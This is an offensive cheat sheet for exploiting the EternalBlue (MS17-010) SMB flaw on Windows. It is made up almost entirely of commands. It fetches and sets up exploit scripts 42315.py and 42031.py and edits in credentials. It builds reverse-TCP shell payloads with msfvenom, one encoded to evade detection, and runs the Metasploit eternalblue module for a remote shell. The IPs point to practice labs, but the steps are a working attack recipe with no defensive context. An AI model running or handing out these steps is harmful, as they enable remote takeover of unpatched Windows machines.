Eternal Blue - Exploits

windows, foothold, smb, privesc

Double Pulsar #

42315.py #

# Get mysmb module
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py

# Install dependencies
virtualenv -p py2 virtualenv_eternalblue
source virtualenv_eternalblue/bin/activate
pip install impacket
searchsploit -m 42315.py

# Optional - add username pass (use this if
# anonymous login doesn't work)
(virtualenv_eternalblue) ➜  relevant cat 42315.py| egrep '^(USER|PASS)'
USERNAME = 'Bob'
PASSWORD = '!P@$$W0rD!123'
(virtualenv_eternalblue) ➜  relevant 

# Run
python 42315.py 10.10.82.56

42031.py #

# Setup similar virtualenv with 42315.py
searchsploit -m 42031.py

# Update credentials
(virtualenv_eternalblue) ➜  relevant cat 42031.py | grep login_standard
	conn.login_standard('Bill', 'Juw4nnaM4n420696969!$$$')
(virtualenv_eternalblue) ➜  relevant

# Generate shell code file
msfvenom -p windows/shell/reverse_tcp LHOST=10.11.40.33 LPORT=4444 -e x86/shikata_ga_nai -f exe -o eternalblue.exe

# Run
python 42031.py 10.10.177.9 eternalblue.exe

# NOTE: This doesnt work for windows server 2016

Metasploit #

# If victim is vulnerable to ms17-010 eternalblue,
# try to use metasploit. NOTE: if this fail on first
# time try running it a couple more times.
msf> use windows/smb/ms17_010_eternalblue
msf> set rhosts 10.10.10.13
msf> set lhost tun0
msf> set payload windows/x64/shell/reverse_tcp
msf> run

# Try upgrading to meterpreter shell

send_and_execute.py #

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.51 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
python send_and_execute.py legacy ms17-010.exe

Troubleshooting #

USERNAME = '\\'
PASSWORD = ''

References #